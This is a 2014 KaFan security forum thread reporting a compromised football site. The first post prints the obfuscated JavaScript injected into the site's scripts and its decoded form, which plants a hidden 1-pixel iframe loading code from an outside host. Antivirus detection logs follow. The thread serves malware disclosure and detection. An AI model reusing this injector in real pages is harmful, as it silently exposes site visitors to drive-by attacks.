查看: 3487|回复: 2
收起左侧

[已鉴定] http://futbolexperience.com/resultado.php?id=542

[复制链接]
fireold
发表于 2014-2-2 07:11:08 | 显示全部楼层 |阅读模式
  1. /*0f2490*/
  2. ps = "s" + "p" + "l" + "i" + "t";
  3. asd = function() {
  4.     --(d.body)
  5. };
  6. a = ("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,165,174,162,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,165,174,162,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,155,173,173,173,155,65,166,171,156,66,132,152,171,160,167,173,172,66,137,131,73,121,125,175,173,113,65,167,157,167,56,102,24,21,47,165,174,162,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,165,174,162,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,165,174,162,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,165,174,162,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,165,174,162,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,165,174,162,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,165,174,162,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,165,174,162,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,165,174,162,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,165,174,162,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21" [ps](","));
  7. d = document;
  8. for (i = 0; i < a.length; i += 1) {
  9.     a[i] = -(10 - 3) + parseInt(a[i], 5 + 3);
  10. }
  11. try {
  12.     asd()
  13. } catch (q) {
  14.     yy = 50 - 50;
  15. }
  16. try {
  17.     yy /= 18
  18. } catch (pq) {
  19.     yy = 1;
  20. }
  21. if (!yy) eval(String["fr" + "omCharCode"].apply(String, a)); /*/0f2490*/
复制代码

  1. function zzzfff() {
  2.      var nuk = document.createElement('iframe');

  3.      nuk.src = 'http://ftttf.org/Scripts/XR4JNvtD.php';
  4.      nuk.style.position = 'absolute';
  5.      nuk.style.border = '0';
  6.      nuk.style.height = '1px';
  7.      nuk.style.width = '1px';
  8.      nuk.style.left = '1px';
  9.      nuk.style.top = '1px';

  10.      if (!document.getElementById('nuk')) {
  11.          document.write('<div id=\'nuk\'></div>');
  12.          document.getElementById('nuk').appendChild(nuk);
  13.      }
  14. }

  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.      var today = new Date();
  17.      var expire = new Date();
  18.      if (nDays == null || nDays == 0) nDays = 1;
  19.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  21. }

  22. function GetCookie(name) {
  23.      var start = document.cookie.indexOf(name + "=");
  24.      var len = start + name.length + 1;
  25.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  26.          return null;
  27.      }
  28.      if (start == -1) return null;
  29.      var end = document.cookie.indexOf(";", len);
  30.      if (end == -1) end = document.cookie.length;
  31.      return unescape(document.cookie.substring(len, end));
  32. }
  33. if (navigator.cookieEnabled) {
  34.      if (GetCookie('visited_uq') == 55) {} else {
  35.          SetCookie('visited_uq', '55', '1', '/');

  36.          zzzfff();
  37.      }
  38. }
复制代码


Avira
2014/2/2 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\jquery.nivo.slider.pack[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
      執行的動作:傳輸至掃描程式

2014/2/2 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\jquery.nivo.slider.pack[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
      執行的動作:拒絕存取

2014/2/2 上午 06:58 [Web Protection] 發現惡意程式碼
      從 URL "http://futbolexperience.com/js/jquery.nivo.slider.pack.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EB.37' [virus]。
      已採取動作:已略過

2014/2/2 上午 06:58 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\jquery.easing.1.3[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.37' [virus]
      已採取動作:
      檔案會移動至 '5085d117.qua' 名稱底下的隔離區目錄!

2014/2/2 上午 06:58 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\sexylightbox.v2.3.jquery[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.37' [virus]
      已採取動作:
      檔案會移動至 '4815fea4.qua' 名稱底下的隔離區目錄!

2014/2/2 上午 06:58 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數:        845
      目錄數:        0
      惡意程式碼數:        2
      警告數:        0

2014/2/2 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\cufon-yui[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
      執行的動作:傳輸至掃描程式

2014/2/2 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\Futura[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
      執行的動作:拒絕存取

2014/2/2 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\cufon-yui[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
      執行的動作:拒絕存取

2014/2/2 上午 06:58 [Web Protection] 發現惡意程式碼
      從 URL "http://futbolexperience.com/js/cufon-yui.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EB.37' [virus]。
      已採取動作:已略過

2014/2/2 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\menu[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
      執行的動作:拒絕存取

2014/2/2 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\Futura[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
      執行的動作:傳輸至掃描程式

2014/2/2 上午 06:58 [Web Protection] 發現惡意程式碼
      從 URL "http://futbolexperience.com/js/Futura.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EB.37' [virus]。
      已採取動作:已略過

2014/2/2 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\menu[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.37 [virus]'
      執行的動作:傳輸至掃描程式

2014/2/2 上午 06:58 [Web Protection] 發現惡意程式碼
      從 URL "http://futbolexperience.com/js/menu.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EB.37' [virus]。
      已採取動作:已略過


av2.jpg


fs is
fs2.jpg


Sophos
****************** Sophos Anti-Virus 日誌紀錄 - 2014/2/1 下午 11:04:14 **************

    ...
20140201 230256        使用者 WILLIAM\alan 的網頁要求 "futbolexperience.com/css/estilos.css" (從 "futbolexperience.com/resultado.php" 連結)  已受到攔截。已在此網站發現 'Troj/Iframe-JH',索引 ID 154419513。
20140201 230300        使用者 WILLIAM\alan 的網頁要求 "futbolexperience.com/sexylightbox/jquery.easing.1.3.js" (從 "futbolexperience.com/resultado.php" 連結)  已受到攔截。已在此網站發現 'Troj/Iframe-JH',索引 ID 154419513。
20140201 230302        使用者 WILLIAM\alan 的網頁要求 "futbolexperience.com/img/arrahona.jpg" (從 "futbolexperience.com/resultado.php" 連結)  已受到攔截。已在此網站發現 'Troj/Iframe-JH',索引 ID 154419513。
20140201 230304        使用者 WILLIAM\alan 的網頁要求 "futbolexperience.com/img/topnav_bg.gif" (從 "futbolexperience.com/resultado.php" 連結)  已受到攔截。已在此網站發現 'Troj/Iframe-JH',索引 ID 154419513。
      (4 個項目)


s2.jpg

z紫f风l铃
发表于 2014-4-27 10:58:51 | 显示全部楼层
ESET
QQ图片20140427105824.jpg
z紫f风l铃
发表于 2014-5-2 19:06:45 | 显示全部楼层
FSCS报毒
QQ图片20140502190622.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 19:50 , Processed in 0.137594 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表